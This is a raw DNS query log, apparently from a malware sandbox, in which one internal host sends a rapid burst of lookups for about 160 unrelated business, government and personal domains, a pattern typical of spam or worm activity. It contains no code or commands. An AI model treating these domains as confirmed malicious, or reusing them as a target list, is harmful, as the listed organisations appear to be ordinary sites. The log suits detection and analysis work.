                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.594501972 CEST192.168.2.48.8.8.80x1538Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.597254038 CEST192.168.2.48.8.8.80x400eStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.600471973 CEST192.168.2.48.8.8.80x65c8Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.604310036 CEST192.168.2.48.8.8.80xb3e4Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.605766058 CEST192.168.2.48.8.8.80xac92Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.613063097 CEST192.168.2.48.8.8.80x8fb0Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.619535923 CEST192.168.2.48.8.8.80xec18Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.621855974 CEST192.168.2.48.8.8.80x5ff0Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.632916927 CEST192.168.2.48.8.8.80x7941Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.650358915 CEST192.168.2.48.8.8.80xfa3fStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.654377937 CEST192.168.2.48.8.8.80xf001Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.662249088 CEST192.168.2.48.8.8.80x408aStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.674113035 CEST192.168.2.48.8.8.80xa1beStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.677824974 CEST192.168.2.48.8.8.80xc41Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.678875923 CEST192.168.2.48.8.8.80x8e47Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.686161041 CEST192.168.2.48.8.8.80x9a45Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.692245007 CEST192.168.2.48.8.8.80xd1e8Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.703493118 CEST192.168.2.48.8.8.80x8120Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.718307018 CEST192.168.2.48.8.8.80xfe74Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.723148108 CEST192.168.2.48.8.8.80x8c9bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.740521908 CEST192.168.2.48.8.8.80xfb99Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.754098892 CEST192.168.2.48.8.8.80xab77Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.756601095 CEST192.168.2.48.8.8.80xc771Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.770639896 CEST192.168.2.48.8.8.80xcaaeStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.778970003 CEST192.168.2.48.8.8.80x4682Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.789565086 CEST192.168.2.48.8.8.80x7e85Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.807862043 CEST192.168.2.48.8.8.80x84b8Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.824101925 CEST192.168.2.48.8.8.80x64f8Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.824522018 CEST192.168.2.48.8.8.80x5d1bStandard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.836587906 CEST192.168.2.48.8.8.80xa8a2Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.854211092 CEST192.168.2.48.8.8.80x35a6Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.854211092 CEST192.168.2.48.8.8.80x37fStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.885248899 CEST192.168.2.48.8.8.80xdf3fStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.900918961 CEST192.168.2.48.8.8.80x65eeStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.902815104 CEST192.168.2.48.8.8.80xf311Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.915146112 CEST192.168.2.48.8.8.80xec99Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.935456991 CEST192.168.2.48.8.8.80xf032Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.982307911 CEST192.168.2.48.8.8.80x7777Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.993113995 CEST192.168.2.48.8.8.80xf0dcStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:31.993113995 CEST192.168.2.48.8.8.80x15cbStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.025912046 CEST192.168.2.48.8.8.80x508fStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.048151016 CEST192.168.2.48.8.8.80xbfe2Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.058856010 CEST192.168.2.48.8.8.80xe10eStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.065016031 CEST192.168.2.48.8.8.80xc238Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.066665888 CEST192.168.2.48.8.8.80x8754Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.086153984 CEST192.168.2.48.8.8.80x6e9bStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.090331078 CEST192.168.2.48.8.8.80xda90Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.151427984 CEST192.168.2.48.8.8.80x1cbcStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.172023058 CEST192.168.2.48.8.8.80x730Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.182210922 CEST192.168.2.48.8.8.80xa5dfStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.184427977 CEST192.168.2.48.8.8.80x2cf9Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.184478998 CEST192.168.2.48.8.8.80x2f3dStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.185111046 CEST192.168.2.48.8.8.80xad72Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.188936949 CEST192.168.2.48.8.8.80x2a5Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.227166891 CEST192.168.2.48.8.8.80xe5f5Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.240641117 CEST192.168.2.48.8.8.80xcbe5Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.242264032 CEST192.168.2.48.8.8.80x606fStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.245393038 CEST192.168.2.48.8.8.80x6964Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.260000944 CEST192.168.2.48.8.8.80x17b7Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.274857998 CEST192.168.2.48.8.8.80x1037Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.291121006 CEST192.168.2.48.8.8.80x61beStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.292346954 CEST192.168.2.48.8.8.80x9Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.317889929 CEST192.168.2.48.8.8.80x7661Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.333568096 CEST192.168.2.48.8.8.80x3af3Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.341485977 CEST192.168.2.48.8.8.80xb4b2Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.341485977 CEST192.168.2.48.8.8.80x1bf2Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.347369909 CEST192.168.2.48.8.8.80x3852Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.369077921 CEST192.168.2.48.8.8.80x2a63Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.383374929 CEST192.168.2.48.8.8.80xb157Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.403939009 CEST192.168.2.48.8.8.80xfee2Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.443821907 CEST192.168.2.48.8.8.80x723eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.450645924 CEST192.168.2.48.8.8.80x395fStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.461013079 CEST192.168.2.48.8.8.80x774bStandard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.462187052 CEST192.168.2.48.8.8.80x1f20Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.480532885 CEST192.168.2.48.8.8.80x87e9Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.480710983 CEST192.168.2.48.8.8.80xb00dStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.494896889 CEST192.168.2.48.8.8.80xb0afStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.494898081 CEST192.168.2.48.8.8.80x4fStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.536195040 CEST192.168.2.48.8.8.80xc4f6Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.564627886 CEST192.168.2.48.8.8.80x1cbdStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.564627886 CEST192.168.2.48.8.8.80x6e14Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.565002918 CEST192.168.2.48.8.8.80xec48Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.596647024 CEST192.168.2.48.8.8.80x4168Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.602663994 CEST192.168.2.48.8.8.80x35d2Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.633630991 CEST192.168.2.48.8.8.80xf1aaStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.633631945 CEST192.168.2.48.8.8.80xb432Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.665730953 CEST192.168.2.48.8.8.80xe2dbStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.666096926 CEST192.168.2.48.8.8.80x8d5dStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.719149113 CEST192.168.2.48.8.8.80x7e1Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.723156929 CEST192.168.2.48.8.8.80x5e2dStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.727636099 CEST192.168.2.48.8.8.80x552fStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.736035109 CEST192.168.2.48.8.8.80x6ce8Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.740923882 CEST192.168.2.48.8.8.80xf432Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.760344982 CEST192.168.2.48.8.8.80xde15Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.761964083 CEST192.168.2.48.8.8.80x2166Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.762454987 CEST192.168.2.48.8.8.80xe1f5Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.766895056 CEST192.168.2.48.8.8.80x926dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.802417040 CEST192.168.2.48.8.8.80xd85bStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.860367060 CEST192.168.2.48.8.8.80x1f1cStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.866440058 CEST192.168.2.48.8.8.80xa7eaStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.868299961 CEST192.168.2.48.8.8.80x8dbeStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.871997118 CEST192.168.2.48.8.8.80xb45bStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.887258053 CEST192.168.2.48.8.8.80x9441Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.934581995 CEST192.168.2.48.8.8.80xa941Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:32.946285963 CEST192.168.2.48.8.8.80x404dStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.008835077 CEST192.168.2.48.8.8.80xaf11Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.043562889 CEST192.168.2.48.8.8.80xd310Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.044073105 CEST192.168.2.48.8.8.80x3dd6Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.071266890 CEST192.168.2.48.8.8.80xb71Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.086431026 CEST192.168.2.48.8.8.80xcc1Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.107836008 CEST192.168.2.48.8.8.80xa3cfStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.119236946 CEST192.168.2.48.8.8.80xec81Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.122669935 CEST192.168.2.48.8.8.80xb051Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.134119034 CEST192.168.2.48.8.8.80x1541Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.145859957 CEST192.168.2.48.8.8.80x4c67Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.182261944 CEST192.168.2.48.8.8.80x6730Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.215675116 CEST192.168.2.48.8.8.80x928eStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.227310896 CEST192.168.2.48.8.8.80x2e40Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.243506908 CEST192.168.2.48.8.8.80xfe36Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.275732040 CEST192.168.2.48.8.8.80x5218Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.299550056 CEST192.168.2.48.8.8.80x6cfbStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.323256016 CEST192.168.2.48.8.8.80xff77Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.349370003 CEST192.168.2.48.8.8.80x3af3Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.414985895 CEST192.168.2.48.8.8.80x1029Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.419656992 CEST192.168.2.48.8.8.80xd2f8Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.430953026 CEST192.168.2.48.8.8.80x3598Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.448554039 CEST192.168.2.48.8.8.80x96f2Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.458473921 CEST192.168.2.48.8.8.80x723eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.462475061 CEST192.168.2.48.8.8.80x1668Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.463953972 CEST192.168.2.48.8.8.80xd252Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.464921951 CEST192.168.2.48.8.8.80xf4cfStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.495609045 CEST192.168.2.48.8.8.80x1969Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.509172916 CEST192.168.2.48.8.8.80xe972Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.542941093 CEST192.168.2.48.8.8.80x228bStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.593717098 CEST192.168.2.48.8.8.80x8e48Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.602709055 CEST192.168.2.48.8.8.80xf882Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.629240990 CEST192.168.2.48.8.8.80xabe8Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.703094006 CEST192.168.2.48.8.8.80xe93dStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.729516983 CEST192.168.2.48.8.8.80x9650Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.731358051 CEST192.168.2.48.8.8.80x864cStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.759320021 CEST192.168.2.48.8.8.80x99d0Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.808084965 CEST192.168.2.48.8.8.80x4f5bStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.811778069 CEST192.168.2.48.8.8.80x68dfStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.901640892 CEST192.168.2.48.8.8.80xf638Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.915532112 CEST192.168.2.48.8.8.80x4f1dStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.915824890 CEST192.168.2.48.8.8.80xef13Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.937865973 CEST192.168.2.48.8.8.80x37fbStandard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.942219973 CEST192.168.2.48.8.8.80x4704Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.970050097 CEST192.168.2.48.8.8.80x62beStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.972363949 CEST192.168.2.48.8.8.80x4399Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.979866982 CEST192.168.2.48.8.8.80xfaacStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.988118887 CEST192.168.2.48.8.8.80x33fbStandard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.995312929 CEST192.168.2.48.8.8.80x4150Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:33.998359919 CEST192.168.2.48.8.8.80xaa53Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.020339966 CEST192.168.2.48.8.8.80xce6Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.114552975 CEST192.168.2.48.8.8.80xa3cfStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.139738083 CEST192.168.2.48.8.8.80xc9a9Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.141835928 CEST192.168.2.48.8.8.80x9093Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.151616096 CEST192.168.2.48.8.8.80x4381Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.169815063 CEST192.168.2.48.8.8.80xa3c0Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.181782961 CEST192.168.2.48.8.8.80xf6a0Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.181967974 CEST192.168.2.48.8.8.80x43b3Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.230788946 CEST192.168.2.48.8.8.80x84a0Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.232752085 CEST192.168.2.48.8.8.80xfd30Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.235125065 CEST192.168.2.48.8.8.80x660Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.272918940 CEST192.168.2.48.8.8.80x3c5Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.302758932 CEST192.168.2.48.8.8.80x6cfbStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.323688984 CEST192.168.2.48.8.8.80xe921Standard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.324951887 CEST192.168.2.48.8.8.80xd895Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.386948109 CEST192.168.2.48.8.8.80xfca7Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.462351084 CEST192.168.2.48.8.8.80xb3c5Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.499653101 CEST192.168.2.48.8.8.80x59a3Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.517812967 CEST192.168.2.48.8.8.80x8d28Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.610224009 CEST192.168.2.48.8.8.80xb77fStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.652832031 CEST192.168.2.48.8.8.80xa2e2Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:34.682375908 CEST192.168.2.48.8.8.80xf0eaStandard query (0)daytonir.comA (IP address)IN (0x0001)false
